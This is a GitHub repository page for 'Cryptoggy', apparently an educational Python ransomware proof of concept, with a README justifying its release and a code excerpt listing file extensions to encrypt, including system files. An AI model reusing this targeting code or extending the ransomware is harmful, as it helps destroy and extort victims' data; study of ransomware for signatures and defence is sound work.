Skip to content

Cryptoggy is an open source, fully python ransomware .

License

Notifications You must be signed in to change notification settings

Yezz123-Archive/Cryptoggy

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Cryptoggy:

Cryptoggy is an open source, fully python ransomware PoC. It's main purpose is not to be run like most software projects, but to be read for educational purposes.

Aside from very minor testing to ensure there are no syntax errors, no testing has been done. This may occur at a later time to ensure it performs in all expected environments,but that is not the point. The point is to be a simple to read PoC that makes for an easy example of what ransomware is and how it works. And hopefully, this can lead to a better understanding of ransomware in the network defense and sysadmin communities.

Why?

There is a severe lack of open source ransomware, and for good reason! But by having so few examples, and those examples being inaccurate (intentionally bad code with flaws), or just too complicated, it doesn't leave much to analyze and learn from. People seem to think that ransomware is hard to write. That it's this complex, hard to develop, hard to RE, and hard to prevent beast. A quick read through of this codebase will prove that's not true. Im hoping this can lead to better signatures, a better understanding of how ransomware works and what can be done to stop it, and an overall safer internet.

Extensions:

 def discoverFiles(startpath):
   
   extensions = [
       'exe,', 'dll', 'so', 'rpm', 'deb', 'vmlinuz', 'img',  # SYSTEM FILES - BEWARE! MAY DESTROY SYSTEM!
       'jpg', 'jpeg', 'bmp', 'gif', 'png', 'svg', 'psd', 'raw', # images
       'mp3','mp4', 'm4a', 'aac','ogg','flac', 'wav', 'wma', 'aiff', 'ape', # music and sound
       'avi', 'flv', 'm4v', 'mkv', 'mov', 'mpg', 'mpeg', 'wmv', 'swf', '3gp', # Video and movies

       'doc', 'docx', 'xls', 'xlsx', 'ppt','pptx', # Microsoft office
       'odt', 'odp', 'ods', 'txt', 'rtf', 'tex', 'pdf', 'epub', 'md', # OpenOffice, Adobe, Latex, Markdown, etc
       'yml', 'yaml', 'json', 'xml', 'csv', # structured data
       'db', 'sql', 'dbf', 'mdb', 'iso', # databases and disc images

       'html', 'htm', 'xhtml', 'php', 'asp', 'aspx', 'js', 'jsp', 'css', # web technologies
       'c', 'cpp', 'cxx', 'h', 'hpp', 'hxx', # C source code
       'java', 'class', 'jar', # java source code
       'ps', 'bat', 'vb', # windows based scripts
       'awk', 'sh', 'cgi', 'pl', 'ada', 'swift', # linux/mac based scripts
       'go', 'py', 'pyc', 'bf', 'coffee', # other source code files

       'zip', 'tar', 'tgz', 'bz2', '7z', 'rar', 'bak',  # compressed formats
   ]

Objections!

But aren't you worried someone will abuse it for profit?

  • Not really. There are plenty of much better, more advanced ransomware out there. Even if they do, it's hopefully few compared to the good it will do.

But when they do, it would be your fault!

  • Nope! I only wrote it. I didnt deploy it, I didnt sell it, it's not my problem. Hopefully nobody uses it for evil but thats the price to be paid for good. There's always someone who will do it.

But...

  • Alright. Bottom line. Security is a very reactive business. To make the world more secure you first have to make it less secure. To make better AV and signatures, you must first make better malware. And that's what we're doing here.

Warning: This project is young and incomplete. It will encrypt and decrypt files. That's about it. No key generation, no sending the key back over a secure channel, no dropping new files or wallpapers or whatever. I'll get to that. Maybe. Open an issue if you so desire, pull requests welcome.

Back to top

About

Cryptoggy is an open source, fully python ransomware .

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Sponsor this project

Packages

No packages published

Languages